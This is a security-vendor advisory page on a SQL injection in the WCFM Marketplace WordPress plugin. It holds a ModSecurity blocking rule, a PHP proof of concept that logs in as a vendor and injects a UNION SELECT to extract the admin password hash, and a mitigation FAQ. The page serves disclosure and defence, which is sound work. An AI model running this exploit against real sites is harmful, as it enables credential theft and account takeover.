-		$withdrawal_charge_type          = isset( $withdrawal_global_options['withdrawal_charge_type'] ) ? $withdrawal_global_options['withdrawal_charge_type'] : 'no';
-		$withdrawal_charge               = isset( $withdrawal_global_options['withdrawal_charge'] ) ? $withdrawal_global_options['withdrawal_charge'] : array();
-		$transaction_charge_type         = isset( $withdrawal_global_options['transaction_charge_type'] ) ? $withdrawal_global_options['transaction_charge_type'] : 'no';
-		$transaction_charge              = isset( $withdrawal_global_options['transaction_charge'] ) ? $withdrawal_global_options['transaction_charge'] : array();
-
-		$vendor_withdrawal_mode          = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-		$request_auto_approve            = isset( $vendor_data['withdrawal']['request_auto_approve'] ) ? $vendor_data['withdrawal']['request_auto_approve'] : $request_auto_approve;
-		$withdrawal_limit                = isset( $vendor_data['withdrawal']['withdrawal_limit'] ) ? $vendor_data['withdrawal']['withdrawal_limit'] : $withdrawal_limit;
-		$withdrawal_thresold             = isset( $vendor_data['withdrawal']['withdrawal_thresold'] ) ? $vendor_data['withdrawal']['withdrawal_thresold'] : $withdrawal_thresold;
-		$withdrawal_charge_type          = isset( $vendor_data['withdrawal']['withdrawal_charge_type'] ) ? $vendor_data['withdrawal']['withdrawal_charge_type'] : $withdrawal_charge_type;
-
-		$vendor_withdrawal_charge        = isset( $vendor_data['withdrawal']['withdrawal_charge'] ) ? $vendor_data['withdrawal']['withdrawal_charge'] : $withdrawal_charge;
-		$withdrawal_charge_paypal        = isset( $vendor_withdrawal_charge['paypal'] ) ? $vendor_withdrawal_charge['paypal'] : array();
-		$withdrawal_charge_stripe        = isset( $vendor_withdrawal_charge['stripe'] ) ? $vendor_withdrawal_charge['stripe'] : array();
-		$withdrawal_charge_skrill        = isset( $vendor_withdrawal_charge['skrill'] ) ? $vendor_withdrawal_charge['skrill'] : array();
-		$withdrawal_charge_bank_transfer = isset( $vendor_withdrawal_charge['bank_transfer'] ) ? $vendor_withdrawal_charge['bank_transfer'] : array();
-
-		// Transactional Charge
-		$wcfm_transaction_options = array( 'global' => __( 'By Global Rule', 'wc-multivendor-marketplace' ), 'vendor' => __( 'Vendor Specific Rule', 'wc-multivendor-marketplace' ) );
-
-		$active_order_payment_methods    = get_wcfm_marketplace_disallow_order_payment_methods();
-		$vendor_transaction_mode         = isset( $vendor_data['withdrawal']['tra

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20263001,phase:2,deny,status:403,chain,msg:'CVE-2025-63029 via WCFM Marketplace AJAX - SQL Injection',severity:CRITICAL,tag:'CVE-2025-63029'"
  SecRule ARGS_POST:action "@streq wcfm_vendor_order_status_change" 
    "chain"
    SecRule ARGS_POST:order_status "@rx (?:'s*UNION|'s*OR|'s*AND|--|#|;)" 
      "t:lowercase,t:urlDecode,t:removeNulls"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-63029 - WCFM Marketplace – Multivendor Marketplace for WooCommerce <= 3.7.1 - Authenticated (Store vendor+) SQL Injection

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Change this to the target site
$vendor_username = 'attacker_vendor';  // Change to valid vendor credentials
$vendor_password = 'vendor_password'; // Change to valid vendor credentials

// Step 1: Authenticate as a store vendor
$login_url = 'http://example.com/wp-login.php';
$login_data = array(
    'log' => $vendor_username,
    'pwd' => $vendor_password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);

// Step 2: Craft the SQL injection payload in the 'order_status' parameter
// The vulnerable function wcfmmp_vendor_order_status_condition concatenates $status directly
// By injecting a UNION statement, we can extract data (e.g., admin's user_pass)
$payload = "' UNION SELECT user_pass FROM wp_users WHERE user_login='admin' -- ";

// Simulate an AJAX request that triggers the vulnerable functionality
$ajax_action = 'wcfm_vendor_order_status_change'; // Example action; adjust based on real endpoint
$post_data = array(
    'action' => $ajax_action,
    'order_status' => $payload,
    'order_id' => 1 // Arbitrary order ID
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if (curl_errno($ch)) {
    echo 'Error: ' . curl_error($ch) . "n";
} else {
    echo 'Response: ' . $response . "n";
    // The response may contain the extracted password hash
}
curl_close($ch);

// Clean up cookie file
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2025-63029?
Overview of the vulnerability
CVE-2025-63029 is a SQL Injection vulnerability found in the WCFM Marketplace plugin for WooCommerce, affecting versions up to 3.7.1. This vulnerability allows authenticated users with vendor-level access to manipulate SQL queries, potentially extracting sensitive information from the database.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization in the `wcfmmp_vendor_order_status_condition` function. Attackers can inject arbitrary SQL code into existing queries by exploiting user-controlled parameters, allowing them to extract data from the database.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WCFM Marketplace plugin version 3.7.1 or earlier is affected. Specifically, authenticated users with store vendor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the WCFM Marketplace plugin installed. If it is version 3.7.1 or earlier, your site is at risk. Additionally, review logs for any suspicious activity related to SQL queries.
How can I fix this vulnerability?
Mitigation steps
To fix this vulnerability, update the WCFM Marketplace plugin to version 3.7.2 or later, where the issue has been patched. Ensure that all plugins and themes are kept up to date to minimize security risks.
What does the CVSS score of 6.5 mean?
Understanding severity levels
A CVSS score of 6.5 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk if exploited. It is advisable to address vulnerabilities with this score promptly to protect sensitive data.
What is SQL Injection?
Definition and implications
SQL Injection is a code injection technique that allows attackers to interfere with the queries an application makes to its database. This can lead to unauthorized access to sensitive data, data manipulation, and other malicious activities.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker can authenticate as a vendor and exploit the SQL Injection vulnerability by crafting a malicious payload. This payload can be sent through AJAX requests to manipulate the database and extract sensitive information.
What are the potential risks of exploitation?
Consequences of successful attacks
If successfully exploited, an attacker could access sensitive data such as user credentials and session tokens, leading to account takeovers, privilege escalation, or further compromises of the website.
How can I protect my site from similar vulnerabilities in the future?
Best practices for security
To protect your site, regularly update all themes and plugins, implement security measures such as web application firewalls, and conduct regular security audits. Additionally, consider using security plugins that can help detect and mitigate vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-63029 can be found on the official CVE database, security advisories from the plugin developers, and security-focused websites that provide vulnerability analyses.
What should I do if I cannot update the plugin immediately?
Interim mitigation strategies
If you cannot update the plugin immediately, consider disabling the WCFM Marketplace plugin temporarily or restricting access to authenticated users until the patch can be applied. Additionally, monitor your site’s logs for any suspicious activity.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations